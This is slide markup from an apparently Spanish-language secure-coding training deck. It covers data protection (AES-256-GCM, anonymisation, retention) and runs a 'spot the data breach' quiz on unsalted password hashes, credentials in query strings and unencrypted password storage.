                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cifrado simétrico tanto para tránsito como en almacenamiento: AES 256 GCM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386603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0FC0-FA93-7B42-98D3-5F6E08D79DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10585536" cy="1006475"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Asegurando los datos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF9E1B1F-BFAA-4247-AC86-F90A58FEAE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1575103"/>
            <a:ext cx="10585537" cy="4857012"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Otras formas:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Anonimizar datos privados</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>No recolectar o enviar datos privados</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cortos períodos de retención</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-UY" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Asegurar el control de sus datos a los usuarios </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23188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B74973-79DF-714C-909D-0723420CF39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="613459" y="3646026"/>
            <a:ext cx="8506790"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UY" sz="7200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Juguemos a:</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s-UY" sz="7800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>¡DETECTAR LA BRECHA DE DATOS!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UY" sz="4400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282048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C9757A-203F-9940-94A3-9B2E661663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780074"/>
            <a:ext cx="12192000" cy="5297852"/>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2515027"/>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5327606"/>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55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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8000" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8000" dirty="0"/>
              <a:t>hashing_top.java</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6000" dirty="0"/>
              <a:t> almacenado con un hash sin saltear)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64408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5F7C20-9697-7C45-A656-D74773A2B3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="686234"/>
            <a:ext cx="12192000" cy="5308209"/>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1287121"/>
            <a:ext cx="12192000" cy="325925"/>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4068976"/>
            <a:ext cx="12192000" cy="325925"/>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75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5299C5F-45D1-E625-E002-AECFD3081812}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1760964"/>
            <a:ext cx="10515600" cy="3336071"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>Respuesta: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
              <a:t>boton.java</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="8800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0"/>
              <a:t>(Usuario y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0" err="1"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0"/>
              <a:t> transmitidos en claro a través de parámetros del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34747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DC96BC-0A95-D04F-9666-BCBA3B340B25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="283978"/>
            <a:ext cx="12192000" cy="6083139"/>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1125427"/>
            <a:ext cx="12192000" cy="27902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4219355"/>
            <a:ext cx="12192000" cy="280102"/>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93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C3C7-1406-1E4B-AA89-63A52DA31801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2103120" y="132751"/>
            <a:ext cx="9645535" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" b="1" dirty="0"/>
              <a:t>Falta de cifrado de datos sensibles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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1507314" y="1916745"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8D73A4-34F7-BB4F-A702-D68B3A75FFA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507314" y="2722496"/>
            <a:ext cx="732893" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/login</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0292" y="4586324"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BBC84B-9A44-AD43-915F-EA2939C046D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438384" y="5533482"/>
            <a:ext cx="801823" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Usuario</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Curved Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71BF70E-D78E-A54F-90D0-4E93C36FAC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17" idx="0"/>
            <a:endCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1122903" y="3835467"/>
            <a:ext cx="1494496" cy="7219"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">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6B146178-72F2-974B-BB4F-8808455E4F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225771" y="2353164"/>
            <a:ext cx="1622851" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 72384"/>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Oval Callout 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75853034-607F-5A46-AF53-671BEBDC74EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2144227" y="4140896"/>
            <a:ext cx="2546770" cy="853384"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45278"/>
              <a:gd name="adj2" fmla="val 57632"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade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user: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eve</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ABCDEFG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Can 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2E31EB4-DA07-574F-AF8A-4C27D3735E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3576181" y="1681028"/>
            <a:ext cx="2968668" cy="2304908"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="82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793290B-35DE-2740-87F9-3E1EBBF4BEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4496981" y="1786746"/>
            <a:ext cx="1058175" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Table 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF2B7407-F54F-8E4E-B55C-FA39C397CFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3789061705"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3848622" y="2444177"/>
          <a:ext cx="2423786" cy="1280160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="576195">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3099737838"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="839244">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="832907464"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008347">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1141760440"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1283997765"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5163</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2642470997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5164</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>eve</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ABCDEFG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="851265560"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="260661">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>5165</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3311727319"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Graphic 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29526945-CCB0-3041-B7E9-1015ACB53B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25775" y="4614628"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA615CE2-F4DC-6A4C-9BC9-8B65BB21197D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6006986" y="5578042"/>
            <a:ext cx="891591" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Curved Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E343B43-8C29-C14B-B106-F29A19F9789E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5574146" y="3686749"/>
            <a:ext cx="1522800" cy="332957"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25676"/>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FE4F600-5B81-8C47-99BC-5D8CBC86C129}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226796" y="4119940"/>
            <a:ext cx="1318053" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data breach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
